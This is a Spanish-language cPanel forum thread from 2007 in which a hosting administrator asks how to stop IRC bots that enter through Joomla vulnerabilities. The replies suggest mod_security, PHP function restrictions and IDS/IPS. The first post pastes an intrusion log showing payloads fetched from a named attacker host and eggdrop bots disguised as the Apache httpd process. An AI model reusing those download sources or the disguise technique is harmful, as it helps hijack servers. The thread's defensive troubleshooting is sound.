The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Ataques IRC

Discussion in 'Discusión en Español' started by Piolon, Oct 18, 2007.

  1. Piolon

    Piolon Well-Known Member

    Joined:
    Feb 20, 2007
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    Estoy recibiendo ataques al servidor y veo que el denominador común son robots que se controlan mediante IRC. Los introducen por vulnerabilidades de Joomla u otro sistema de ese tipo y luego toman el control del servidor...

    Aparte de pedir a todos mis usuarios que controlen la seguridad de sus aplicaciones.. alguien sabe como defenderme de esos ataques o como bloquear las conexiones mediante IRC ??

    Aqui adjunto un log para que vean como sube los archivos y de qué archivo se trata... incluso pueden descargarlo para su análisis....

    Desde ya agradezco todo tipo de ayuda....

    *********************************************************************

    --12:18:30-- http://antariksa.rcucoremapsul-sel.com/arjuna.tar.gz
    => `arjuna.tar.gz'
    Risoluzione di antariksa.rcucoremapsul-sel.com in corso... 74.52.137.130
    Connessione a antariksa.rcucoremapsul-sel.com|74.52.137.130:80... connesso.
    HTTP richiesta inviata, aspetto la risposta... 200 OK
    Lunghezza: 1,858,628 (1.8M) [application/x-tar]

    0K .......... .......... .......... .......... .......... 2% 59.57 KB/s
    50K .......... .......... .......... .......... .......... 5% 60.37 KB/s
    100K .......... .......... .......... .......... .......... 8% 100.02 KB/s
    150K .......... .......... .......... .......... .......... 11% 143.05 KB/s
    200K .......... .......... .......... .......... .......... 13% 141.32 KB/s
    250K .......... .......... .......... .......... .......... 16% 111.25 KB/s
    300K .......... .......... .......... .......... .......... 19% 141.45 KB/s
    350K .......... .......... .......... .......... .......... 22% 147.71 KB/s
    400K .......... .......... .......... .......... .......... 24% 147.46 KB/s
    450K .......... .......... .......... .......... .......... 27% 147.64 KB/s
    500K .......... .......... .......... .......... .......... 30% 149.14 KB/s
    550K .......... .......... .......... .......... .......... 33% 150.79 KB/s
    600K .......... .......... .......... .......... .......... 35% 152.29 KB/s
    650K .......... .......... .......... .......... .......... 38% 153.15 KB/s
    700K .......... .......... .......... .......... .......... 41% 154.77 KB/s
    750K .......... .......... .......... .......... .......... 44% 157.75 KB/s
    800K .......... .......... .......... .......... .......... 46% 219.27 KB/s
    850K .......... .......... .......... .......... .......... 49% 162.62 KB/s
    900K .......... .......... .......... .......... .......... 52% 168.96 KB/s
    950K .......... .......... .......... .......... .......... 55% 223.68 KB/s
    1000K .......... .......... .......... .......... .......... 57% 140.64 KB/s
    1050K .......... .......... .......... .......... .......... 60% 56.65 KB/s
    1100K .......... .......... .......... .......... .......... 63% 81.93 KB/s
    1150K .......... .......... .......... .......... .......... 66% 136.85 KB/s
    1200K .......... .......... .......... .......... .......... 68% 138.85 KB/s
    1250K .......... .......... .......... .......... .......... 71% 143.70 KB/s
    1300K .......... .......... .......... .......... .......... 74% 146.83 KB/s
    1350K .......... .......... .......... .......... .......... 77% 135.91 KB/s
    1400K .......... .......... .......... .......... .......... 79% 133.66 KB/s
    1450K .......... .......... .......... .......... .......... 82% 167.87 KB/s
    1500K .......... .......... .......... .......... .......... 85% 150.53 KB/s
    1550K .......... .......... .......... .......... .......... 88% 168.43 KB/s
    1600K .......... .......... .......... .......... .......... 90% 155.25 KB/s
    1650K .......... .......... .......... .......... .......... 93% 153.73 KB/s
    1700K .......... .......... .......... .......... .......... 96% 157.64 KB/s
    1750K .......... .......... .......... .......... .......... 99% 158.84 KB/s
    1800K .......... ..... 100% 359.31 KB/s

    12:18:45 (130.03 KB/s) - "arjuna.tar.gz" salvato [1858628/1858628]

    --12:20:51-- http://antariksa.rcucoremapsul-sel.com/indoirc.tcl
    => `indoirc.tcl'
    Risoluzione di antariksa.rcucoremapsul-sel.com in corso... 74.52.137.130
    Connessione a antariksa.rcucoremapsul-sel.com|74.52.137.130:80... connesso.
    HTTP richiesta inviata, aspetto la risposta... 200 OK
    Lunghezza: 337,046 (329K) [application/x-tcl]

    0K .......... .......... .......... .......... .......... 15% 58.91 KB/s
    50K .......... .......... .......... .......... .......... 30% 102.74 KB/s
    100K .......... .......... .......... .......... .......... 45% 134.02 KB/s
    150K .......... .......... .......... .......... .......... 60% 105.03 KB/s
    200K .......... .......... .......... .......... .......... 75% 94.50 KB/s
    250K .......... .......... .......... .......... .......... 91% 106.79 KB/s
    300K .......... .......... ......... 100% 126.71 KB/s

    12:20:55 (96.47 KB/s) - "indoirc.tcl" salvato [337046/337046]

    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14377
    [12:23] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:23] Listening at telnet port 3869 (all)
    [12:23] Module loaded: transfer (with lang support)
    [12:23] Module loaded: channels
    [12:23] Module loaded: server
    [12:23] Module loaded: ctcp
    [12:23] Module loaded: irc
    [12:23] Module loaded: share
    [12:23] Module loaded: filesys (with lang support)
    [12:23] Module loaded: notes (with lang support)
    [12:23] Module loaded: console (with lang support)
    [12:23] Module loaded: blowfish
    [12:23] Module loaded: assoc (with lang support)
    [12:23] Module loaded: wire (with lang support)
    [12:23] Loaded ArjunA.tcl
    [12:23] ArjunA -> War tCl
    [12:23] ======================================
    [12:23] ArjunA TCL Loaded
    [12:23] Contact ArjunA For More Info
    [12:23] ======================================
    [12:23] ping.tcl loaded
    [12:23] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:23] Dns Resolver 3.0 by Arjuna
    [12:23] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:23] Creating channel file
    [12:23] === daengiwan: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14758
    [12:25] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:25] Listening at telnet port 3870 (all)
    [12:25] Module loaded: transfer (with lang support)
    [12:25] Module loaded: channels
    [12:25] Module loaded: server
    [12:25] Module loaded: ctcp
    [12:25] Module loaded: irc
    [12:25] Module loaded: share
    [12:25] Module loaded: filesys (with lang support)
    [12:25] Module loaded: notes (with lang support)
    [12:25] Module loaded: console (with lang support)
    [12:25] Module loaded: blowfish
    [12:25] Module loaded: assoc (with lang support)
    [12:25] Module loaded: wire (with lang support)
    [12:25] Loaded ArjunA.tcl
    [12:25] ArjunA -> War tCl
    [12:25] ======================================
    [12:25] ArjunA TCL Loaded
    [12:25] Contact ArjunA For More Info
    [12:25] ======================================
    [12:25] ping.tcl loaded
    [12:25] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:25] Dns Resolver 3.0 by Arjuna
    [12:25] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:25] Creating channel file
    [12:25] === daengiwan: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14928
    [12:25] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:25] Listening at telnet port 3870 (all)
    [12:25] Module loaded: transfer (with lang support)
    [12:25] Module loaded: channels
    [12:25] Module loaded: server
    [12:25] Module loaded: ctcp
    [12:25] Module loaded: irc
    [12:25] Module loaded: share
    [12:25] Module loaded: filesys (with lang support)
    [12:25] Module loaded: notes (with lang support)
    [12:25] Module loaded: console (with lang support)
    [12:25] Module loaded: blowfish
    [12:25] Module loaded: assoc (with lang support)
    [12:25] Module loaded: wire (with lang support)
    [12:25] Loaded ArjunA.tcl
    [12:25] ArjunA -> War tCl
    [12:25] ======================================
    [12:25] ArjunA TCL Loaded
    [12:25] Contact ArjunA For More Info
    [12:25] ======================================
    [12:25] ping.tcl loaded
    [12:25] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:25] Dns Resolver 3.0 by Arjuna
    [12:25] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:25] Creating channel file
    [12:25] === daeng: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 15062
    [12:27] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:27] Listening at telnet port 3871 (all)
    [12:27] Module loaded: transfer (with lang support)
    [12:27] Module loaded: channels
    [12:27] Module loaded: server
    [12:27] Module loaded: ctcp
    [12:27] Module loaded: irc
    [12:27] Module loaded: share
    [12:27] Module loaded: filesys (with lang support)
    [12:27] Module loaded: notes (with lang support)
    [12:27] Module loaded: console (with lang support)
    [12:27] Module loaded: blowfish
    [12:27] Module loaded: assoc (with lang support)
    [12:27] Module loaded: wire (with lang support)
    [12:27] Loaded ArjunA.tcl
    [12:27] ArjunA -> War tCl
     
  2. n1ck

    n1ck Member

    Joined:
    Oct 3, 2007
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    Deberias investigar que ningun usuario tenga acceso ssh en las cuentas de cpanel, yo te aconsejaria instalar mod_Security para apache y bloquear intentos de injecciones por php tales como descargas de esos robots y instalaciones de script. Tambien te aconsejaria editar el disable_functions en php.ini para no permitir funciones exec o posibles intentos de usar un phpshell.

    Si necesitas ayuda mandame un PM.


    Saludos.
     
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    El problema que tienes mucho no tiene que ver con el tcl que se llama arjuna... eso es un tcl para un eggdrop que es un bot de usos multiples ( muy dudosamente para rootkit o ataques ) ..el problema que radica en apps php que permiten file inclusion es que permiten en el /tmp dejar un archivo perl el cual es ejecutado por el usuario que corra el apache o bien owner de la web vulnerada...por lo cual ya tienes varias cosas para fijarte... ( archivos en el /tmp extraños o procesos camuflados como procesos de apache que esten generando mucho uso de CPU ) la solución mas practica es que uses algun tipo de IDS o IPS ( si es por firewall mejor ) .. o bien una solución practica es usar el MOD_SECURITY con todas las reglas actualizadas .. para evitar file inclusions ..

    respecto del ataque a los irc que tienes pues... lo unico que evita estos ataques son los provedores con firewalls por hard en los Datacenters.. o bien un cisco ASA o Guard dedicado a tu equipo..( algunos ISP proveen esos servicios ) .

    espero esto te ayude con tu problema ..

    Saludos.
     
  4. Piolon

    Piolon Well-Known Member

    Joined:
    Feb 20, 2007
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    Ante todo muchas gracias....

    Como decía.. ante todo muchas gracias por responder !!!!

    Siempre que me encuentro con el eggdrop es gracias a un sitio con Joomla instalado... Lamentablemente no puedo decirle a todo el mundo que no lo utilice...

    En definitiva.. tengo el mod_security instalado y creo que actualizado con las últimas reglas... lo voy a revisar...

    Sinceramente no sé como lo hacen pero siguen levantando archivos... Me ayuda a detectarlos el nobody_check que hago correr periódicamente, pero tampoco es la gran solución...

    No hay forma de configurar el fireworks del servidor (software) para evitar ataques IRC ??

    Agradezco desde ya su atención...
     

Share This Page